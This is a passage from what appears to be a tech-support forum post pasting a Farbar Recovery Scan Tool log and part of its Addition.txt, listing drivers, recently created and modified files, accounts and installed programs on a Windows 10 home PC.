R3 HHTHid; C:\WINDOWS\System32\drivers\HHTHid.sys [24784 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 HHTHid_ArtvhMouFiltr; C:\WINDOWS\System32\drivers\HHTHidMouFiltr.sys [23896 2019-10-10] (Shenzhen Evision Semiconductor Technology Co.,Ltd. -> 0)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-10-31] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
S3 VCamSDK; C:\WINDOWS\system32\DRIVERS\VCamSDK.sys [1090904 2019-12-22] (Shanghai Yitu Information Technology Co.,Ltd. -> e2eSoft)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8596792 2022-07-18] (Riot Games, Inc. -> Riot Games, Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [49576 2022-06-22] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [452856 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [91384 2022-06-22] (Microsoft Windows -> Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) (Whitelisted) =========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-07-21 17:21 - 2022-07-21 17:21 - 000003842 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onLogOn
2022-07-21 17:21 - 2022-07-21 17:21 - 000003400 _____ C:\WINDOWS\system32\Tasks\EOSv3 Scheduler onTime
2022-07-21 17:21 - 2022-07-21 17:21 - 000001172 _____ C:\Users\Miggy\Documents\eset.txt
2022-07-21 15:20 - 2022-07-21 15:20 - 000001382 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ESET Online Scanner.lnk
2022-07-21 15:20 - 2022-07-21 15:20 - 000001276 _____ C:\Users\Miggy\Desktop\ESET Online Scanner.lnk
2022-07-21 15:20 - 2022-07-21 15:20 - 000000000 ____D C:\Users\Miggy\AppData\Local\ESET
2022-07-21 15:19 - 2022-07-21 15:19 - 015274968 _____ (ESET) C:\Users\Miggy\Downloads\esetonlinescanner.exe
2022-07-20 12:12 - 2022-07-20 20:49 - 000001064 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2022.lnk
2022-07-19 16:46 - 2022-07-21 17:22 - 000000000 ____D C:\Users\Miggy\Downloads\FRST-OlderVersion
2022-07-17 18:37 - 2022-07-17 18:37 - 000000222 _____ C:\Users\Miggy\Desktop\Batman™ Arkham Knight.url
2022-07-17 17:51 - 2022-07-19 16:46 - 000001045 _____ C:\Users\Miggy\Downloads\Fixlog.txt
2022-07-15 22:41 - 2022-07-15 22:42 - 000000000 ____D C:\AdwCleaner
2022-07-15 22:41 - 2022-07-15 22:41 - 008551608 _____ (Malwarebytes) C:\Users\Miggy\Downloads\AdwCleaner.exe
2022-07-15 22:32 - 2022-07-16 14:43 - 000080864 _____ C:\Users\Miggy\Downloads\Addition.txt
2022-07-15 22:31 - 2022-07-21 17:22 - 002369536 _____ (Farbar) C:\Users\Miggy\Downloads\FRST64.exe
2022-07-15 22:31 - 2022-07-21 17:22 - 000025117 _____ C:\Users\Miggy\Downloads\FRST.txt
2022-07-15 22:31 - 2022-07-21 17:22 - 000000000 ____D C:\FRST
2022-07-15 18:39 - 2022-07-15 18:40 - 060178785 _____ C:\Users\Miggy\Downloads\dokkan-scout.exe
2022-07-14 14:26 - 2022-07-14 14:26 - 000000000 ____D C:\Users\Miggy\AppData\Local\Enverr
2022-07-13 22:29 - 2022-07-13 22:29 - 000000220 _____ C:\Users\Miggy\Desktop\Garry's Mod.url
2022-07-13 18:34 - 2022-07-13 18:34 - 000693248 _____ C:\WINDOWS\system32\FsNVSDeviceSource.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000470528 _____ (curl, hxxps://curl.se/) C:\WINDOWS\SysWOW64\curl.exe
2022-07-13 18:34 - 2022-07-13 18:34 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mode.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000018944 _____ C:\WINDOWS\SysWOW64\WsdProviderUtil.dll
2022-07-13 18:34 - 2022-07-13 18:34 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tree.com
2022-07-13 18:34 - 2022-07-13 18:34 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 002260480 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000640512 _____ C:\WINDOWS\system32\SettingSyncDownloadHelper.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000530944 _____ (curl, hxxps://curl.se/) C:\WINDOWS\system32\curl.exe
2022-07-13 18:33 - 2022-07-13 18:33 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000270848 _____ C:\WINDOWS\system32\EsclScan.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000152064 _____ C:\WINDOWS\system32\EsclProtocol.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000061952 _____ C:\WINDOWS\system32\printticketvalidation.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000057344 _____ C:\WINDOWS\system32\APMonUI.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mode.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000024576 _____ C:\WINDOWS\system32\WsdProviderUtil.dll
2022-07-13 18:33 - 2022-07-13 18:33 - 000020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2022-07-13 18:33 - 2022-07-13 18:33 - 000011811 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-07-13 18:26 - 2022-07-13 18:26 - 000000000 ___HD C:\$WinREAgent
2022-07-12 17:37 - 2022-07-12 17:37 - 000000000 ____D C:\Users\Miggy\AppData\Local\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000001032 _____ C:\Users\Public\Desktop\ONN..lnk
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ONN
2022-07-12 17:36 - 2022-07-12 17:36 - 000000000 ____D C:\Program Files (x86)\ONN
2022-07-12 17:36 - 2019-10-10 08:59 - 000024784 _____ (0) C:\WINDOWS\system32\Drivers\HHTHid.sys
2022-07-12 17:36 - 2019-10-10 08:59 - 000023896 _____ (0) C:\WINDOWS\system32\Drivers\HHTHidMouFiltr.sys
2022-07-12 17:35 - 2022-07-12 17:36 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05 (1).exe
2022-07-12 17:35 - 2022-07-12 17:35 - 091204040 _____ () C:\Users\Miggy\Downloads\Onn Setup20211115V1.0.0.5.05.exe
2022-07-11 22:18 - 2022-07-11 22:18 - 000000223 _____ C:\Users\Miggy\Desktop\Fears to Fathom - Episode 2.url
2022-07-11 16:14 - 2022-07-11 16:14 - 000000000 ____D C:\Program Files\EA Games
2022-07-10 16:25 - 2022-07-10 16:25 - 000000000 ____D C:\Users\Miggy\Documents\New folder
2022-07-07 22:26 - 2022-07-09 19:54 - 000000000 ____D C:\Program Files\Mozilla Firefox
2022-07-05 18:55 - 2022-07-14 16:27 - 000000000 ____D C:\Program Files (x86)\Origin Games
2022-07-05 18:55 - 2022-07-05 18:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\Haze1
2022-07-05 18:54 - 2022-07-05 18:54 - 000001066 _____ C:\Users\Public\Desktop\Origin.lnk
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2022-07-05 18:54 - 2022-07-05 18:54 - 000000000 ____D C:\Program Files (x86)\Origin
2022-07-05 18:53 - 2022-07-14 20:33 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Origin
2022-07-03 14:39 - 2022-07-17 19:45 - 000000000 ____D C:\Users\Miggy\Documents\WB Games
2022-07-03 14:39 - 2022-07-03 14:39 - 000000000 ____D C:\Users\Miggy\AppData\Local\Downloaded Installations
2022-06-27 18:02 - 2022-06-27 18:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Ardent Studios
2022-06-27 18:01 - 2022-06-27 18:01 - 000000223 _____ C:\Users\Miggy\Desktop\Smithworks.url
2022-06-24 21:24 - 2022-06-24 21:24 - 000000000 ____D C:\Users\Miggy\Documents\Telltale Games
2022-06-24 17:10 - 2022-06-24 17:10 - 000000000 ____D C:\Users\Miggy\Documents\Square Enix
2022-06-23 22:51 - 2022-06-23 22:51 - 000000000 ____D C:\Users\Miggy\AppData\Local\TJoC_R
2022-06-22 22:58 - 2022-07-18 20:39 - 000001130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro 2022.lnk
2022-06-22 20:31 - 2022-06-22 20:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\Visage
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mediatonic
2022-06-21 13:02 - 2022-06-21 13:02 - 000000000 ____D C:\Users\Miggy\AppData\Local\EOSUserHelper
2022-06-21 12:26 - 2022-06-22 20:22 - 000000000 ____D C:\Users\Miggy\AppData\Local\TwistedCarnivalDemo2
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2022-07-21 17:22 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\discord
2022-07-21 17:21 - 2020-11-24 16:45 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-21 17:19 - 2020-07-31 19:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\Discord
2022-07-21 17:15 - 2020-07-31 18:23 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-21 17:08 - 2019-12-07 02:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-21 17:03 - 2020-02-05 16:06 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-21 17:02 - 2020-08-02 14:57 - 000000000 ____D C:\ProgramData\Origin
2022-07-21 16:49 - 2021-11-03 16:17 - 000000000 ____D C:\Users\Miggy\AppData\Local\Origin
2022-07-21 16:06 - 2020-07-31 19:11 - 000000000 ____D C:\Users\Miggy\AppData\Local\Spotify
2022-07-21 15:26 - 2021-07-09 21:35 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Mozilla
2022-07-21 15:23 - 2020-07-31 20:07 - 000000000 ____D C:\Users\Miggy\AppData\Local\CrashDumps
2022-07-21 15:22 - 2021-11-13 19:25 - 000004152 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{1A3EA42E-993D-412D-B564-43DC52E6644C}
2022-07-21 15:22 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-07-21 15:19 - 2020-08-04 16:40 - 000000000 ___RD C:\Users\Miggy\Creative Cloud Files
2022-07-21 15:19 - 2020-07-31 19:08 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Spotify
2022-07-21 15:19 - 2020-07-31 18:18 - 000000000 ___RD C:\Users\Miggy\OneDrive
2022-07-20 23:01 - 2020-08-04 16:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2022-07-20 20:49 - 2022-01-10 16:17 - 000001976 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Streamlabs Desktop.lnk
2022-07-20 20:49 - 2021-07-09 21:35 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2022-07-20 20:49 - 2020-08-13 00:26 - 000002438 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-20 20:49 - 2020-07-31 20:28 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-07-20 20:49 - 2020-07-31 19:48 - 000000000 ____D C:\ProgramData\Riot Games
2022-07-20 20:49 - 2020-02-11 17:44 - 000001209 _____ C:\ProgramData\NvcDispCorePlugin.log_backup1
2022-07-20 20:49 - 2020-02-05 16:07 - 000022478 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2022-07-20 20:49 - 2020-02-05 16:07 - 000017940 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2022-07-20 16:28 - 2021-03-15 13:17 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-07-20 14:56 - 2021-03-15 13:25 - 000840598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-07-20 14:56 - 2019-12-07 02:13 - 000000000 ____D C:\WINDOWS\INF
2022-07-20 14:53 - 2022-05-17 17:09 - 000002493 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2022.lnk
2022-07-20 14:53 - 2022-05-12 17:24 - 000001386 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2022-07-20 14:53 - 2022-01-25 18:36 - 000005016 _____ C:\ProgramData\rsEngine.config.backup
2022-07-20 14:53 - 2020-07-31 18:24 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-20 14:50 - 2019-12-07 02:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-20 14:49 - 2021-03-15 13:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-07-20 14:49 - 2021-03-15 13:17 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-20 14:49 - 2020-07-31 18:36 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-07-20 14:49 - 2019-12-07 02:03 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2022-07-20 12:12 - 2020-11-06 18:11 - 000000000 ___HD C:\adobeTemp
2022-07-20 12:11 - 2020-07-31 18:24 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-07-20 12:08 - 2021-03-15 13:21 - 000003536 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-07-20 12:06 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Common Files\Adobe
2022-07-19 17:55 - 2020-08-01 19:19 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-07-19 16:43 - 2020-07-31 20:17 - 000000000 ____D C:\Program Files\Riot Vanguard
2022-07-18 23:05 - 2022-01-10 16:18 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\slobs-client
2022-07-18 20:58 - 2021-12-10 22:51 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-18 20:58 - 2021-03-15 13:21 - 000003364 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2826498334-1472090739-1589450912-1002
2022-07-18 20:58 - 2021-03-15 13:18 - 000002383 _____ C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-17 23:16 - 2021-01-02 18:45 - 000000000 ____D C:\Users\Miggy\AppData\Local\Battle.net
2022-07-17 18:45 - 2022-05-28 20:04 - 000000000 ____D C:\Program Files (x86)\Overwatch
2022-07-17 18:37 - 2020-08-01 09:48 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-07-17 18:36 - 2021-01-02 18:45 - 000000000 ____D C:\Program Files (x86)\Battle.net
2022-07-17 17:51 - 2021-01-12 22:42 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Temp
2022-07-16 21:09 - 2022-02-09 20:48 - 000000000 ____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-07-16 12:06 - 2020-08-13 00:26 - 000002276 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-14 14:33 - 2022-06-05 15:02 - 000000000 ____D C:\Users\Miggy\Documents\MEGAsync Downloads
2022-07-13 23:07 - 2021-03-15 13:17 - 000257904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-07-13 23:06 - 2021-03-15 13:18 - 000000000 ____D C:\Users\Miggy
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\setup
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\system32\DDFs
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2022-07-13 23:06 - 2019-12-07 02:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-07-13 22:47 - 2020-08-01 12:57 - 000001425 _____ C:\Users\Miggy\Desktop\Roblox Player.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000001248 _____ C:\Users\Miggy\Desktop\Roblox Studio.lnk
2022-07-13 22:47 - 2020-08-01 12:52 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-07-13 18:36 - 2019-12-07 02:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-07-13 18:33 - 2021-03-15 13:19 - 003010560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-07-13 18:26 - 2020-08-01 15:02 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-07-13 18:23 - 2020-08-01 15:02 - 146546848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-07-13 18:22 - 2020-01-24 10:48 - 000000000 ____D C:\Program Files (x86)\AMD
2022-07-12 13:10 - 2020-10-08 10:01 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\SurvivioSteam
2022-07-11 22:21 - 2022-01-22 00:32 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\Rayll
2022-07-11 01:10 - 2021-03-19 22:09 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\Vortex
2022-07-11 00:47 - 2022-04-09 15:31 - 000000000 ____D C:\Users\Miggy\AppData\Local\FalloutNV
2022-07-11 00:46 - 2021-12-28 23:14 - 000000000 ____D C:\Users\Miggy\AppData\Local\Fallout4
2022-07-10 19:31 - 2021-05-01 00:24 - 000000000 ____D C:\Users\Miggy\AppData\Local\BattlEye
2022-07-10 16:26 - 2022-06-19 19:14 - 000000000 ____D C:\Users\Miggy\Documents\Electronic Arts
2022-07-10 16:17 - 2020-08-04 16:36 - 000000000 ____D C:\Program Files\Adobe
2022-07-10 16:04 - 2020-10-10 20:06 - 000000000 ____D C:\Users\Miggy\Documents\My Games
2022-07-10 15:38 - 2021-07-16 15:06 - 000000000 ____D C:\Users\Miggy\AppData\Local\Ubisoft Game Launcher
2022-07-09 19:54 - 2021-07-09 21:35 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2022-07-08 21:35 - 2021-11-22 21:01 - 000144872 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 002754024 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000402920 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000234984 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000198096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2022-07-08 21:35 - 2020-09-14 10:45 - 000067048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2022-07-08 20:35 - 2021-10-15 21:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2022-07-07 15:34 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\D3DSCache
2022-07-05 15:18 - 2022-03-12 10:58 - 000000000 ____D C:\Users\Miggy\Desktop\RPCS3
2022-07-02 23:24 - 2020-01-24 10:41 - 000000000 __RHD C:\Users\Public\AccountPictures
2022-06-26 22:13 - 2020-08-23 13:56 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\MMFApplications
2022-06-25 14:08 - 2020-01-24 10:41 - 000000000 ____D C:\ProgramData\Packages
2022-06-23 22:51 - 2020-07-31 20:34 - 000000000 ____D C:\Users\Miggy\AppData\Local\UnrealEngine
2022-06-23 18:25 - 2022-06-05 14:55 - 000000000 ____D C:\Users\Miggy\AppData\Local\MEGAsync
2022-06-22 22:58 - 2020-09-25 11:07 - 000000000 ____D C:\Users\Public\Documents\Adobe
2022-06-22 22:48 - 2020-08-04 16:37 - 000000000 ____D C:\ProgramData\Adobe
2022-06-22 20:30 - 2022-05-12 17:28 - 000000000 ____D C:\XboxGames
2022-06-22 20:30 - 2020-07-31 18:16 - 000000000 ____D C:\Users\Miggy\AppData\Local\Packages
2022-06-22 17:19 - 2020-08-04 16:35 - 000000000 ____D C:\Users\Miggy\AppData\Local\Adobe
2022-06-22 17:19 - 2019-07-31 00:08 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2022-06-21 23:56 - 2021-10-03 18:40 - 000000000 ____D C:\Users\Miggy\AppData\LocalLow\PowerLine Studios
2022-06-21 13:02 - 2021-12-29 17:50 - 000000000 ____D C:\Users\Miggy\AppData\Roaming\EasyAntiCheat
2022-06-21 11:46 - 2020-08-01 22:42 - 000000000 ____D C:\Program Files\Epic Games
 
==================== Files in the root of some directories ========
 
2021-05-18 08:49 - 2021-10-15 16:59 - 000000032 _____ () C:\Users\Miggy\AppData\Roaming\.machineId
2021-01-20 10:18 - 2021-01-20 10:18 - 000000116 _____ () C:\Users\Miggy\AppData\Roaming\debug.log
2022-03-08 21:51 - 2022-03-08 22:04 - 000000055 _____ () C:\Users\Miggy\AppData\Roaming\grizzly.ini
2020-11-28 13:16 - 2020-11-28 13:16 - 000000098 _____ () C:\Users\Miggy\AppData\Roaming\LauncherSettings_live.cfg
2020-11-28 12:39 - 2020-11-28 12:39 - 000002577 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_live.bin
2020-11-28 13:06 - 2020-11-28 13:06 - 000000048 _____ () C:\Users\Miggy\AppData\Roaming\TheHunterSettings_steam_live.cfg
2020-08-04 16:43 - 2020-08-04 16:43 - 000000000 _____ () C:\Users\Miggy\AppData\Local\oobelibMkey.log
2021-10-18 17:32 - 2021-10-18 17:32 - 000016438 _____ () C:\Users\Miggy\AppData\Local\partner.bmp
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
==================== End of FRST.txt ========================
 
And here is Addition.txt:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 21-07-2022
Ran by Miggy (21-07-2022 17:23:15)
Running from C:\Users\Miggy\Downloads
Microsoft Windows 10 Home Version 21H2 19044.1826 (X64) (2021-03-15 20:22:02)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
 
(If an entry is included in the fixlist, it will be removed.)
 
Administrator (S-1-5-21-2826498334-1472090739-1589450912-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2826498334-1472090739-1589450912-503 - Limited - Disabled)
Guest (S-1-5-21-2826498334-1472090739-1589450912-501 - Limited - Disabled)
Miggy (S-1-5-21-2826498334-1472090739-1589450912-1002 - Administrator - Enabled) => C:\Users\Miggy
WDAGUtilityAccount (S-1-5-21-2826498334-1472090739-1589450912-504 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 21.02 alpha (x64) (HKLM\...\7-Zip) (Version: 21.02 alpha - Igor Pavlov)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.7.1.1 - Adobe Inc.)
Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: 7.7.0.35 - Adobe Inc.)
Adobe Illustrator 2022 (HKLM-x32\...\ILST_26_3_1) (Version: 26.3.1 - Adobe Inc.)
Adobe Photoshop 2022 (HKLM-x32\...\PHSP_23_4_2) (Version: 23.4.2.603 - Adobe Inc.)
Adobe Premiere Pro 2022 (HKLM-x32\...\PPRO_22_5) (Version: 22.5 - Adobe Inc.)
AMD Radeon Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.10.16 - Advanced Micro Devices, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Balanced (HKLM-x32\...\{0EA45DD4-A825-420C-AFED-C659EFE3B84F}) (Version: 4.00.0000 - Advanced Micro Devices, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Discord (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\Discord) (Version: 0.0.309 - Discord Inc.)
Dolphin (HKLM-x32\...\Dolphin) (Version: 5.0 - Dolphin Team)
EA app (HKLM\...\{C2622085-ABD2-49E5-8AB9-D3D6A642C091}) (Version: 12.0.231.5217 - Electronic Arts) Hidden
EA app (HKLM-x32\...\{c5b4b74e-fcb0-4603-b92d-3d17c96a6d69}) (Version: 12.0.231.5217 - Electronic Arts)
Epic Games Launcher (HKLM-x32\...\{0EE6DDEF-E36B-45EB-9E03-5A266EC8A8F8}) (Version: 1.1.279.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{4B31654B-80C2-405C-91C9-49B14AEB0F42}) (Version: 2.0.32.0 - Epic Games, Inc.)
Fallout: New Vegas (HKLM-x32\...\Fallout: New Vegas_is1) (Version:  - )
FL Studio 20 (HKLM-x32\...\FL Studio 20) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.134 - Google LLC)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft GameInput (HKLM-x32\...\{A9CFD6A1-C0D3-7F37-C220-8B104867EF15}) (Version: 10.1.22621.1011 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2826498334-1472090739-1589450912-1002\...\OneDriveSetup.exe) (Version: 22.141.0703.0002 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
